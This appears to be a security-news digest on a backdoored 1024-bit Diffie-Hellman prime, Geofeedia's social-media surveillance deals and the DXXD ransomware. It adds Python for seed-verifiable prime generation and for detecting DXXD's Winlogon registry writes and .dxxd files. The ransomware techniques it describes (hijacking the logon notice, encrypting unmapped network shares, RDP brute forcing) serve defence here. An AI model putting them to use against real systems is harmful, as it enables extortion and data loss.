And now, researchers from University of Pennsylvania, INRIA, CNRS and Université de Lorraine have practically proved how the NSA broke the most widespread encryption used on the Internet.
Diffie-Hellman key exchange (DHE) algorithm is a standard means of exchanging cryptographic keys over untrusted channels, which allows protocols such as HTTPS, SSH, VPN, SMTPS and IPsec to negotiate a secret key and create a secure connection.
Since applications that rely on the Diffie-Hellman key exchange algorithm generate ephemeral keys using groups of large prime numbers, it would take hundreds or thousands of years and a nearly unimaginable amount of money to decrypt secure communications directly.
However, it took researchers just two months and as many as 3,000 CPUs to break one of the 1,024-bit keys that are used to secure communications on the Internet today, which could have allowed them to passively decrypt hundreds of millions of HTTPS-based communications and other Transport Layer Security (TLS) channels.
Encrypted communications could have an undetectable backdoor
You might be wondering how the researchers managed to do something which practically takes hundreds of years, with the computational hardware available today.
In a research paper [PDF] published Tuesday, the researchers explained that the Diffie-Hellman algorithm itself does not contain any backdoor, but that it has been intentionally weakened in an undetectable way by hiding how various applications generate their prime numbers.
Additionally, the size of the keys chosen for the Diffie-Hellman algorithm (i.e. 1024-bit or smaller) also matters a lot.
The researchers created a weak 1024-bit Diffie-Hellman trapdoor function, i.e. a large prime number selected at random but from a predefined group, and showed that solving the discrete logarithm problem that underpins its security is about 10,000 times easier.
"Current estimates for 1024-bit discrete log in general suggest that such computations are likely within range for an adversary who can afford hundreds of millions of dollars of special-purpose hardware," the researchers wrote in their paper.
So, advanced hackers or well-resourced agencies who know how the prime numbers of such a trapdoor function were generated, and who want to decrypt 1024-bit secured communications, can solve the discrete logarithm in order to decrypt hundreds of millions of Diffie-Hellman-protected communications.
"The discrete logarithm computation for our backdoored prime was only feasible because of the 1024-bit size, and the most effective protection against any backdoor of this type has always been to use key sizes for which any computation is infeasible," the researchers said.
The researchers also estimate that conducting similar computations for 2048-bit keys, even with backdoored prime numbers, would be 16 million times harder than for 1024-bit keys and will remain infeasible for many years to come.
Despite the U.S. National Institute of Standards and Technology (NIST) recommending a transition to key sizes of at least 2,048 bits since 2010, 1024-bit keys are still widely used online.
According to a survey performed by the SSL Pulse project, 22% of the Internet's top 140,000 HTTPS-protected sites used 1024-bit keys as of last month, which can be broken by state-sponsored adversaries or intelligence agencies like the NSA.
Therefore, the immediate solution to this issue is to switch to 2048-bit or even 4,096-bit keys, but, according to the researchers, in the future all standardized prime numbers should be published together with their seeds.
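To make the proposed remedy concrete, here is an added example (not code from the paper or from any standard) of what "publishing a prime together with its seed" buys you: the prime is derived deterministically from a public seed and a counter, so anyone can re-run the derivation and confirm that nobody picked a special prime. It is a simplified scheme, not the FIPS 186-4 procedure, the seed is a constructed value, and it produces ordinary (not safe) primes at a demo size of 256 bits.

```python
import hashlib

def _is_probable_prime(n: int) -> bool:
    """Miller-Rabin with fixed small bases; demonstration strength only."""
    if n < 2:
        return False
    bases = (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37)
    for b in bases:
        if n % b == 0:
            return n == b
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for a in bases:
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True

def _candidate(seed: bytes, counter: int, bits: int) -> int:
    """Expand SHA-256(seed || counter || i) into an odd `bits`-bit integer."""
    out, i = b"", 0
    while len(out) * 8 < bits:
        out += hashlib.sha256(seed + counter.to_bytes(4, "big") + i.to_bytes(4, "big")).digest()
        i += 1
    x = int.from_bytes(out, "big") >> (len(out) * 8 - bits)  # keep the top `bits` bits
    return x | (1 << (bits - 1)) | 1  # force exact bit length and oddness

def generate_prime(seed: bytes, bits: int = 256) -> tuple:
    """Walk the counter until the derived candidate is prime; publish (p, counter) with the seed."""
    for counter in range(1 << 16):
        p = _candidate(seed, counter, bits)
        if _is_probable_prime(p):
            return p, counter
    raise RuntimeError("no prime found for this seed")

def verify_prime(p: int, seed: bytes, counter: int, bits: int = 256) -> bool:
    """Anyone holding the published seed and counter can re-derive and check p."""
    return (p.bit_length() == bits and _candidate(seed, counter, bits) == p
            and _is_probable_prime(p))
```

A prime shipped without its seed cannot be checked this way, which is exactly the gap the researchers' trapdoor exploits; a real Diffie-Hellman group would additionally require p to be a safe prime and be 2048 bits or larger.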
The concept of backdooring primes used in the Diffie-Hellman key exchange algorithm is similar to the one discovered in the Dual Elliptic Curve Deterministic Random Bit Generator, better known as Dual_EC_DRBG, which is also believed to have been introduced by the NSA.
Almost three years ago, the Snowden leaks revealed that RSA received a $10 million bribe from the NSA to implement its flawed cryptographic algorithm Dual_EC_DRBG as the default in its BSAFE security toolkit, in order to keep encryption weak.
So, it would not be at all surprising if the NSA were using these undetectable, weakened "trapdoors" in millions of cryptographic keys to decrypt encrypted traffic over the Internet.

Facebook, Twitter and Instagram Share Data with Location-based Social Media Surveillance Startup
12.10.2016 thehackernews  Social
Facebook, Instagram, Twitter, VK, Google's Picasa and YouTube were handing over user data access to a Chicago-based startup — the developer of a social media monitoring tool — which then sold this data to law enforcement agencies for surveillance purposes, the ACLU disclosed Tuesday.
Government records obtained by the American Civil Liberties Union (ACLU) revealed that the big technology corporations gave "special access" to Geofeedia.
Geofeedia is a controversial social media monitoring tool that pulls social media feeds via APIs and other means of access and then makes them searchable and accessible to its clients, who can search by location or keyword to quickly find recently posted, publicly available content.
The company has marketed its services to 500 law enforcement and public safety agencies as a tool to track racial protests in Ferguson, Missouri, following the 2014 police shooting death of Michael Brown.
With the help of a public records request, the civil rights group found that Geofeedia had entered into agreements with Twitter, Facebook, and Instagram for their users' data, gaining developer-level access to all three social networks that allowed it to review streams of user content in ways that ordinary members of the public cannot.
The Denver Police Department recently signed a $30,000 annual deal with Geofeedia.
Here's what the major tech giants offered Geofeedia:
Facebook allowed the company to use its "Topic Feed API" that let Geofeedia obtain a "ranked feed of public posts" centered around specific hashtags, places or events.
Instagram provided Geofeedia access to its API (Application Programming Interface) that is a feed of data from users' public Instagram posts, including their location.
Twitter provided Geofeedia with "searchable access" to its database of public tweets. However, Twitter added further contract terms in February to safeguard against surveillance, and when it found Geofeedia still touting its product as a tool to monitor protests, Twitter sent Geofeedia a cease and desist letter.
Facebook, Instagram, and Twitter have all moved to restrict Geofeedia's access after learning about the tool's activities when presented with the ACLU's findings.
The ACLU is concerned that Geofeedia can "disproportionately impact communities of color" by monitoring activists and their neighborhoods.
Nicole Ozer, technology and civil liberties policy director for the ACLU of California, said: "These special data deals were allowing the police to sneak in through a side door and use these powerful platforms to track protesters."
However, in response to the ACLU report, Geofeedia published an article on Tuesday defending its commitment to freedom of speech and civil liberties, releasing the following statement:
"Geofeedia has in place clear policies and guidelines to prevent the inappropriate use of our software; these include protections related to free speech and ensuring that end-users do not seek to inappropriately identify individuals based on race, ethnicity, religion, sexual orientation or political beliefs, among other factors."
Facebook said in a statement that Geofeedia only had access to publicly available data, while Twitter said it was suspending access shortly.
The ACLU is encouraging social media companies to adopt clear, public, and transparent policies prohibiting developers from exploiting user data for surveillance purposes.

DXXD Ransomware, displays legal notice and encrypts files on unmapped network shares
12.10.2016 securityaffairs Virus

The DXXD ransomware specifically targets servers and is able to encrypt files on network shares even if they haven’t been mapped.
Malware continues to evolve; the latest threat to implement a singular feature is the DXXD ransomware. The peculiarity of this threat is that it also encrypts files on network shares, even if they are unmapped (a feature already implemented by the Locky ransomware), and displays a legal notice.

The DXXD ransomware appends the .dxxd extension to the encrypted files, then leaves a ransom note on the infected machine. The DXXD ransom note instructs victims to contact rep_stosd@protonmail.com or rep_stosd@tuta.io.

Another interesting feature of the malware is its ability to configure a Windows Registry setting in order to display a sort of "legal notice" when people log into a computer. The VXers used this feature so that any user who tries to log in to the server sees the ransom note.

The DXXD ransomware changes the HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption and HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText registry values to display the following note.

“When you start Windows, Windows Defender works to help protect your PC by scanning for malicious or unwanted software.”
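The two Winlogon values and the appended .dxxd extension described above are the host-level traces a defender can watch for. Here is an added example (not from the article or from BleepingComputer) of detection logic run over a few constructed, Sysmon-style events: Event ID 13 (registry value set) and Event ID 11 (file create) with their Image, TargetObject and TargetFilename fields; the process paths and file names are made up for the sample.

```python
# Indicators taken from the article; the event records below are CONSTRUCTED,
# Sysmon-style (Event 13 = registry value set, Event 11 = file create), not real logs.
WINLOGON = r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
LEGAL_NOTICE_VALUES = {
    (WINLOGON + r"\LegalNoticeCaption").lower(),
    (WINLOGON + r"\LegalNoticeText").lower(),
}
RANSOM_EXT = ".dxxd"

SAMPLE_EVENTS = [  # constructed sample; process and file names are invented
    {"EventID": 13, "Image": r"C:\Users\svc\AppData\Local\Temp\upd.exe",
     "TargetObject": WINLOGON + r"\LegalNoticeText",
     "Details": "When you start Windows, Windows Defender works to help protect your PC ..."},
    {"EventID": 13, "Image": r"C:\Windows\System32\svchost.exe",
     "TargetObject": WINLOGON + r"\Shell", "Details": "explorer.exe"},  # benign neighbour value
    {"EventID": 11, "Image": r"C:\Users\svc\AppData\Local\Temp\upd.exe",
     "TargetFilename": r"\\fileserver\finance\Q3-report.xlsx.dxxd"},  # unmapped share
    {"EventID": 11, "Image": r"C:\Program Files\Microsoft Office\EXCEL.EXE",
     "TargetFilename": r"\\fileserver\finance\Q3-report.xlsx"},  # normal save, no alert
]

def detect(events):
    """Return one (indicator, process image, target) tuple per event matching a DXXD trace."""
    alerts = []
    for ev in events:
        if ev.get("EventID") == 13 and ev.get("TargetObject", "").lower() in LEGAL_NOTICE_VALUES:
            alerts.append(("winlogon_legal_notice_set", ev["Image"], ev["TargetObject"]))
        elif ev.get("EventID") == 11 and ev.get("TargetFilename", "").lower().endswith(RANSOM_EXT):
            alerts.append(("dxxd_extension_created", ev["Image"], ev["TargetFilename"]))
    return alerts

def suspect_processes(events):
    """Processes that both rewrote the logon notice and created .dxxd files: the strongest signal."""
    by_image = {}
    for indicator, image, _target in detect(events):
        by_image.setdefault(image, set()).add(indicator)
    return {img for img, inds in by_image.items() if len(inds) == 2}
```

A legitimate logon-banner policy writes the same two Winlogon values, so the registry alert on its own is a triage item against your baseline; the combination returned by suspect_processes is the one worth paging on.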

[Image: dxxd ransomware legal-notice]

The infection vector is still unclear; Abrams speculates that the threat is spread by abusing Remote Desktop Services.

“Based on information discovered, I believe that the ransomware developer is hacking into servers using Remote Desktop Services and brute forcing passwords. If you have been affected by the DXXD Ransomware, you should reset all the passwords for the affected machine.” wrote Lawrence Abrams.

According to Abrams, the author of the DXXD ransomware decided to taunt victims and the experts who help them by creating an account on BleepingComputer and claiming that a newer version of the threat is more difficult to decrypt. The developer also claimed to have exploited a zero-day vulnerability to compromise servers and deliver the malware.

[Image: dxxd ransomware developer-no-rdp]

As usual, let me discourage you from paying the ransom, because there is no guarantee that you will get your files back. Don't forget to back up your data frequently and use anti-malware solutions. In this specific case, it may be better to disable Remote Desktop Protocol (RDP) and to block files from running out of the AppData/LocalAppData folders.